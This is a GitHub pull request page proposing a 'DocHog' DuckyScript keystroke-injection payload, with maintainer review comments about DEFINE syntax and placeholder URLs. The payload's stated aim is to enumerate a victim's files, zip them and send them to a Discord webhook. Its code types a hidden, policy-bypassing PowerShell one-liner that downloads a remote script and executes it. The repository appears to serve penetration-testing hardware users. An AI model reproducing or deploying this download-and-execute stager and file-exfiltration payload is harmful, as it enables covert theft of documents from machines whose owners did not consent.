Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New Payload - DocHog #366

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open

New Payload - DocHog #366

wants to merge 5 commits into from

Conversation

atomiczsec
Copy link
Contributor

No description provided.

REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

DEFINE URL http://new-url.com/powershell.ps1
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

this references $URL but your DEFINE is URL and should be #URL

@dallaswinger dallaswinger added the pending requested changes requires changes before merge label Oct 16, 2023
@atomiczsec
Copy link
Contributor Author

@dallaswinger Here is the updated version, please lmk if there needs to be anything else done!

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr URL dl=1; iex $pl
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

(Assuming you are attempting to call your definition for #URL) you need to have a # to call your definition

  STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URL dl=1; iex $pl

REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

DEFINE #URL http://new-url.com/powershell.ps1
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please change this to example.com

Including URLs
URLs used for retrieving staged code should refer exclusively to example.com using DEFINE in any payload submissions see Payload Configuration section below.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
pending requested changes requires changes before merge
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants